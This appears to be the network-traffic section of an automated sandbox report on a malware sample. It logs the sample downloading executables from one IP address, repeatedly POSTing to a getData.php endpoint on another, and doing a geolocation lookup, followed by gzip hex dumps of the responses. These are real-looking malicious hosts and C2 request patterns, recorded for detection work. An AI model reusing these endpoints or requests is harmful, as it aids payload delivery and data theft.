      Source: global trafficHTTP traffic detected: GET /WW/file7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /WW/file6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Host: 136.144.41.133Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global traffic | HTTP traffic detected: POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 133 | Host: 136.144.41.152
      Source: global traffic | HTTP traffic detected: POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 133 | Host: 136.144.41.152
      Source: global traffic | HTTP traffic detected: POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 133 | Host: 136.144.41.152
      Source: global traffic | HTTP traffic detected: POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 133 | Host: 136.144.41.152
      Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Connection: Keep-Alive | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 | viewport-width: 1920 | Host: ip-api.com
      Source: global traffic | HTTP traffic detected: GET /start/?v=2000 HTTP/1.1 | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar) | Host: www.browzar.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /start/css/screen.css?1=1 HTTP/1.1 | Accept: */* | Referer: http://www.browzar.com/start/?v=2000 | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar) | Host: www.browzar.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /start/css/ie8.css HTTP/1.1 | Accept: */* | Referer: http://www.browzar.com/start/?v=2000 | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar) | Host: www.browzar.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /start/images/browzar-logo.png HTTP/1.1 | Accept: */* | Referer: http://www.browzar.com/start/?v=2000 | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar) | Host: www.browzar.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /start/css/ie7.css HTTP/1.1 | Accept: */* | Referer: http://www.browzar.com/start/?v=2000 | Accept-Language: en-US | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar) | Host: www.browzar.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 | Connection: Keep-Alive | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 | viewport-width: 1920 | Host: ip-api.com
      Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Browzar) | Host: www.browzar.com | Connection: Keep-Alive | Cookie: __utma=175377393.1983812090.1624479776.1624479776.1624479776.1; __utmb=175377393.1.10.1624479776; __utmc=175377393; __utmz=175377393.1624479776.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
      Source: global traffic | HTTP traffic detected: GET /seemorebty/il.php?e=md8_8eus HTTP/1.1 | Connection: Keep-Alive | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 | Accept-Language: en-US,en;q=0.9 | Referer: https://www.facebook.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 | Host: 101.36.107.74
      Source: global traffic | HTTP traffic detected: POST /base/api/getData.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 | Content-Length: 133 | Host: 136.144.41.152
      Source: global traffic | HTTP traffic detected: GET /api/fbtime HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 | Host: uyg5wye.2ihsfa.com
      Source: global traffic | HTTP traffic detected: POST /api/?sid=87819&key=00a1b912da62d35571d16217e9d5ff8f HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 | Content-Length: 266 | Host: uyg5wye.2ihsfa.com
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.152
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 185.20.227.194
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: unknown | TCP traffic detected without corresponding DNS query: 136.144.41.133
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe | Code function: 1_2_01250360 __aulldiv,__aulldiv,__aulldiv,__aulldiv,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetReadFile,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetCloseHandle,InternetCloseHandle,
      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Connection: Keep-Alive | Content-Type: text/html; charset=UTF-8 | Content-Length: 1468 | Content-Encoding: gzip | Vary: Accept-Encoding | Date: Wed, 23 Jun 2021 20:22:55 GMT | Server: LiteSpeed | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 dd 6e 1b b7 12 be 8e 01 bf c3 98 07 a9 1d 54 bb 94 ac da 89 ed 5d 19 89 ed c0 e9 6f da 2a c8 29 82 20 18 71 47 2b da 14 b9 21 b9 92 b7 e8 c3 17 dc 1f 79 d5 38 e9 39 68 f7 42 22 39 9c 6f 66 3e 0e 39 93 ec 5d fe 74 31 fd ed f5 15 2c fc 52 c1 eb 37 2f be 7f 75 01 2c e2 fc ed f8 82 f3 cb e9 25 fc f7 7a fa c3 f7 30 8a 87 30 b5 a8 9d f4 d2 68 54 9c 5f fd c8 80 2d bc 2f 4e 39 5f af d7 f1 7a 1c 1b 9b f3 e9 2f fc 2e 60 8d 82 72 3b 8c 7c 4f 33 ce 7c c6 26 bb 3b 49 6d f1 6e a9 b4 4b 1f c0 19 9d 9c 9c 34 ea 0c ee 96 ea 54 a1 ce 53 46 9a c1 66 54 83 10 66 20 b3 94 09 af 86 c3 0f cd ef 35 61 36 0a 36 00 00 12 2f bd a2 c9 0b 6b d6 bf a3 85 3f e0 37 53 5a 28 ac 5c a1 27 58 4b 9d 99 35 18 0d 7e 41 f0 96 66 09 6f f6 b7 ca 4b f2 08 21 ca 88 3e 96 72 95 b2 0b a3 3d 69 1f 4d ab 82 18 88 66 96 32 4f 77 9e 87 88 ce 40 2c d0 3a f2 69 e9 22 74 42 4a 06 bc 73 a5 46 d3 b8 a4 94 ad 24 ad 0b 63 7d 0f 63 2d 33 bf 48 33 5a 49 41 51 3d 39 03 a9 a5 97 a8 22 27 50 51 3a 8a 87 67 9b b8 7a 60 97 e4 84 95 45 38 9a 1e de a5 d1 fb 1e 72 f2 20 b0 cc 17 1e 4c e9 21 82 d2 11 b4 6c c4 70 85 ae 02 6f c2 e2 00 a6 c6 a3 82 d7 81 1a 51 0d e0 8d 23 90 1e 50 57 eb 05 59 8a 61 8a b7 e4 c0 91 30 3a 73 41 2b 33 6b ad 0c 66 03 d0 06 2c e5 d2 79 8b c1 8b 01 dc 94 ce 6f e4 80 3a 83 dc c4 0f 53 f1 1d 55 6b 63 33 d7 73 bd f5 a1 f6 d3 91 1d 6c ce 6b 66 cd da 49 9d 0f a0 1e 91 0d 96 a5 76 1e 95 6a 2d d7 ba 9e e0 95 f6 64 35 f9 6e e7 00 de 1a 7b bb 41 da 88 5b 2e 06 4d e0 9e e0 d7 d2 ce 07 f0 2b ce 09 50 1b 5d 2d 4d e9 1a 90 2f 1b d6 06 16 d2 79 63 ab 9a 0f 2c bd 89 84 59 16 8a 3c d5 2b c2 98 5b 49 f7 fe 68 03 02 c5 a2 b7 12 7c 71 b4 49 cf 7b 9f 5a c1 a0 3b b9 66 e0 d0 3e 4c e9 2f 66 66 7c 9f 50 a9 33 ba 1b cc 8d 52 66 dd 53 69 d2 06 9c 15 9b 3b 88 37 78 17 e7 c6 e4 8a b0 90 2e 16 66 c9 c3 1a 57 72 e6 f8 cd c7 92 6c c5 47 f1 71 fc 4d 3b 89 97 52 c7 37 8e 81 af 0a 6a 6f c2 0d ae b0 c1 66 93 84 37 a3 ee 12 28 a9 6f 61 61 69 9e b2 98 0b e7 82 98 48 c7 c2 b9 f3 51 3a 62 60 49 a5 cc f9 4a 91 5b 10 f9 2d 60 e1 dc a7 ee 67 e8 31 c2 2c 12 4a 92 f6 29 13 18 15 e5 2c 3a 3e 1a 0d 4f 86 a3 e1 f1 f0 f0 d9 f1 b3 c3 11 03 74 95 16 f7 d1 ba 53 ce 0b cc 09 b3 c3 36 62 57 e9 4c 8a 3a 91 ea c0 1b 29 bf 71 1c 33 37 ab 1a 5a 42 b0 9f 44 b5 17 45 ef e4 1c 5e 5d c1 f1 fb cf 46 2a e9 38 84 f9 ff 84 b8 f7 8e 74 26 e7 ef a3 a8 43 6d 2d a9 90 e2 57 f0 f4 4b d6 9e fe 6b d6 f2 c6 da b3 2f 59 7b f6 8f ac ed ee ec ee 24 6d 3e 3e 70 4e c2 51 7b 46 f5 c1 84 e9 8d 3b 17 77 69 36 1e 13 9d cc 9e 1e 1d 1d 89 d1 9c 48 6c 9d cd ee 4e c2 17 84 59 a8 15 33 93 55 93 60 e6 d1 a3 24 93 2b 10 0a 9d 4b d9 bc 54 ca 9b 62 86 36 3c ad 8f c2 97 94 aa 93 3a e9 29 64 ac eb 84 89 92 93 04 db 04 e6 b7 54 cd 09 7d 69 c9 c5 c5 a2 60 50 57 8f 94 7d 47 15 bc 6c 05 6c d2 9f 25 1c 27 09 57 b2 b5 b5 0d b7 20 55 6c e1
      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Connection: Keep-Alive | Cache-Control: public, max-age=604800 | Expires: Wed, 30 Jun 2021 20:22:55 GMT | Content-Type: text/css | Last-Modified: Sun, 20 Jun 2021 08:53:21 GMT | Accept-Ranges: bytes | Content-Encoding: gzip | Vary: Accept-Encoding | Content-Length: 5772 | Date: Wed, 23 Jun 2021 20:22:55 GMT | Server: LiteSpeed | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 3d db 8e db b8 92 cf 09 90 7f e0 41 10 9c 24 b0 d5 92 5a 76 db dd 2f 3b 99 cb ee 3e 2d b0 03 9c 57 83 b6 68 59 a7 65 51 d1 a5 ed 9e 41 fe 7d c1 ab 78 97 9c cc 6c 07 33 68 cb 25 56 b1 58 55 ac 1b d9 a7 fe 5c 2d c0 50 2d 00 ae 16 a0 2a 17 e0 94 2c c0 29 5d 80 d3 fd 02 9c b2 05 38 ad 16 e0 b4 5e 80 23 6e cf 0b 70 2c 51 95 77 a8 5f 00 b8 00 e5 b9 58 80 7d 85 0f cf 5f 07 dc a3 05 68 de bd fd f3 dd db 37 67 d8 16 65 fd 08 e2 a7 77 6f df 34 30 cf cb ba e0 9f f6 b8 cd 51 cb 3e 7c 7b f7 f6 dd db 3d ce 5f d9 5b 3d ba f6 4b 58 95 45 fd 08 0e a8 ee 51 4b 5e 38 e0 0a b7 8f e0 7d 4c 7f e8 10 f0 f0 5c b4 78 a8 f3 a5 f8 f2 37 fa f3 a4 a2 06 70 e8 31 79 72 c4 75 bf 3c c2 73 59 bd 3e 02 d8 96 b0 5a bc a0 36 87 35 5c fc 0e eb 6e d9 a1 b6 3c 4a c0 ae fc 03 3d 82 87 d5 07 41 df dd 67 d0 c3 02 74 fd 6b 85 3a f0 f9 ee dd db d3 3d a3 57 a5 6c bb 35 46 48 a2 0c 9d c5 18 a7 6c d6 1b a9 f2 c6 ca 7a 23 08 be d6 c1 b7 db d8 ff 06 7b 76 41 65 71 ea 1f 41 8d db 33 ac 6e 62 94 e0 71 12 37 d7 71 21 f9 da 57 65 8d 96 27 3e b8 e0 82 93 8c 71 a9 62 90 ac d4 a1 e0 63 55 d6 cf 0b 00 1f 5f ca ae ec 51 ee 61 1f 05 ae 50 81 6a 0e 91 97 5d 53 c1 57 32 ab 1a 09 80 6e 68 b4 f7 ff 17 e5 e3 e2 fe 56 5e 51 07 08 d1 a0 6b e0 a1 ac 0b 50 76 dd 80 3a 70 39 a1 1a 0c 1d 79 d2 0d 0d 11 02 b2 f8 91 1c 4d 99 52 1c 6d d8 94 1a dc 95 7d 89 eb 47 d0 a2 0a f6 e5 0b 21 e2 4d 8f 9b 47 b0 8c a3 35 03 aa d0 b1 e7 da 60 53 54 c1 3d aa 2c 04 da 62 df 7d 2e 50 8d da f2 00 0e 15 ec 3a 26 9a 54 32 a3 b2 26 0c db 57 28 c0 8e e8 58 61 d8 b7 64 81 38 1e f2 f9 11 d0 27 3a 10 a1 54 83 21 0f 24 c8 1e 57 b9 42 a9 10 28 f2 58 c2 1c 2a 04 5b ce 7d f2 2b f9 ba 3f c9 af 99 f0 91 d7 c3 53 8e 86 3a 47 2d 59 25 c5 54 e4 e8 80 5b c8 d8 2d bf 1f 99 84 fb 13 6a 55 e6 10 49 ba b4 b0 69 10 a7 e8 52 e6 fd 89 28 7b dc 5c 9f 0c 03 c4 67 3a ca 3a 11 50 6e 52 18 49 15 2e 30 11 53 36 d6 68 94 1e c1 d0 56 1f a3 e8 ae 3c c3 02 75 77 04 2e fa 77 53 7c 02 35 5e b6 a8 41 90 0e 2c d7 86 da cf a7 91 9c 74 95 30 72 84 12 ad d7 ec b3 6b 0d 7a 58 8c 5c d1 b8 b7 76 e8 3a 5f 1a 7d 52 44 fd e2 27 5b 0e f8 82 e9 62 51 c3 97 b2 a0 3c d7 38 e9 9f 3d aa f3 dd 01 36 06 03 46 24 fa a4 ac 25 d1 4d 0d b8 d7 2c 0e ae a2 1e 37 23 49 2e 51 95 23 66 7c 44 3f a9 7b d8 46 45 79 fc 04 18 8d cb ab 0f 0f a8 4a 61 eb ba 7e 49 25 6c d9 bf 36 48 ea d9 b8 b8 65 cd 85 d2 b5 7a 8e 71 01 8c 4e f8 8c c8 6e ec fa 2e c7 97 ba c2 30 f7 7d 7f 44 b0 1f 5a d4 f9 be 3f a1 aa f1 7d 77 c0 e7 b2 2e 3a 8c 6b ef e8 6d 89 6a 2f ee 03 ae 7b 78 e8 7d 5f f7 18 57 7b 61 0b 6c e1 17 c2 9e 3e 34 21 be 73 fe 4c 49 1d 81 61 6b a9 e9 1c 97 85 f5 fd 14 0e c1 e7 29 3c 02 ae f3 23 db 4c 4e 48 2c da 14 b2 67 f4 ba 13 b0 7e 7c 4
      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Connection: Keep-Alive | Cache-Control: public, max-age=604800 | Expires: Wed, 30 Jun 2021 20:22:55 GMT | Content-Type: text/css | Last-Modified: Sat, 19 Jun 2021 10:07:42 GMT | Accept-Ranges: bytes | Content-Encoding: gzip | Vary: Accept-Encoding | Content-Length: 193 | Date: Wed, 23 Jun 2021 20:22:55 GMT | Server: LiteSpeed | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 65 8f 4d 0a c2 30 10 46 d7 06 72 87 01 77 85 fe 48 45 21 5d 79 94 b4 49 d3 40 9a 84 74 d4 80 78 32 17 1e c9 2b 48 6a db 8d db 61 de e3 7d 9f d7 5b e8 5b a1 9c 53 46 b6 0a 8a 49 f2 d0 0d 28 23 b6 2e c2 83 92 bb 16 38 b0 fa 54 fb d8 50 32 f2 a0 b4 cd 8d ec 91 1d 7c 6c 9e 94 50 b2 e2 57 44 67 13 d3 1b c7 91 05 ad 06 dc 98 f4 0e b5 8f 50 41 b5 82 65 06 17 21 00 07 3d 41 e7 2c 06 67 20 2b 29 d9 73 21 d2 b1 c5 31 e9 76 29 27 e7 46 2b bb 49 77 4b 09 3a cf ce c7 b9 6d 56 a6 35 bf 0d a9 ff 7f 0e 00 80 e7 42 68 ab 66 16 16 f6 0b 59 9a 58 69 09 01 00 00 | Data Ascii: eM0FrwHE!]yI@tx2+Hja}[[SFI(#.8TP2|lPWDgPAe!=A,g +)s!1v)'F+IwK:mV5BhfYXi
      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Connection: Keep-Alive | Cache-Control: public, max-age=604800 | Expires: Wed, 30 Jun 2021 20:22:56 GMT | Content-Type: text/css | Last-Modified: Sat, 19 Jun 2021 10:07:42 GMT | Accept-Ranges: bytes | Content-Encoding: gzip | Vary: Accept-Encoding | Content-Length: 473 | Date: Wed, 23 Jun 2021 20:22:56 GMT | Server: LiteSpeed | Data Raw: 1f 8b 08 00 00 00 00 00 00 03 55 52 db 8e db 20 10 7d 5e 4b fe 87 91 f2 b0 ed 4a 26 ce a5 db 0d 79 6a 7f 24 c2 61 82 51 30 83 00 27 6e a3 fc 7b 85 2f b1 eb c7 c3 cc b9 79 58 83 b6 85 d6 80 d1 ec ae ad a4 7b 38 7c c1 23 cf 9c 90 52 5b 55 44 72 7c 53 ba ee 98 67 95 38 5f 95 a7 d6 4a de 7a f3 8d b1 b5 6e 84 c2 b0 1e 17 4f 87 af 93 21 45 a7 aa 8d 91 2c 53 fa f2 1d 2c 15 1e 1d 8a 08 db d2 75 b0 d9 ba ee f8 cc b3 3c 63 01 85 3f d7 15 75 60 74 52 6c 84 57 da f2 12 36 ae 83 12 ca 61 cc b1 86 3c 3a 21 e7 91 de d3 f6 c7 44 24 f5 8d 85 28 7c 04 96 d4 17 73 15 c5 48 0d 1f 99 04 0b 35 b5 46 de b0 46 21 d1 2f 34 3f 77 bd 64 ca 39 e9 b2 4b 6b cc 05 45 6c 3d 06 a3 ed 35 8d 5f 0c 89 c8 0d 5e e2 2c ad 88 94 c1 4a c1 18 28 62 17 53 a8 47 9e dd b5 8c 35 df 25 f6 e3 4b ab 18 e3 bd 84 46 82 be b3 59 c4 6b 55 c7 79 6b ef 3a 38 2c 7b 59 7f c0 2f 29 21 d6 3a c0 99 6c f4 64 e0 63 9d 67 2b 21 65 02 ab d8 24 b2 b7 64 a7 10 46 2b fb a2 7c 5b d4 f8 73 